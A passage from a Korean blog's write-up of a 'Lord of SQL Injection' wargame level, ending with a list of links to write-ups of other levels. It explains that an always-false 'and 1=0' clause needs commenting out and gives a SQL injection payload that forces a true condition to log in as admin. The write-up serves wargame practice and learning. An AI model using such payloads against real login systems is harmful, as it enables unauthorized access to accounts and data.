pw뒤 and 1=0이니 항상 거짓이다.
and 1=0 이부분을 주석으로 처리해주면 될 것 같다
payload : ?pw=1' or '1' = '1' and id='admin'%23
'Write-Up > LOS (lord of sql injection)' 카테고리의 다른 글
| [Lord of SQL Injection] 12번 darkknight (0) | 2021.01.21 |
|---|---|
| [Lord of SQL Injection] 11번 golem (0) | 2021.01.21 |
| [Lord of SQL Injection] 9번 vampire (0) | 2021.01.21 |
| [Lord of SQL Injection] 8번 troll (0) | 2021.01.21 |
| [Lord of SQL Injection] 7번 orge (0) | 2021.01.21 |
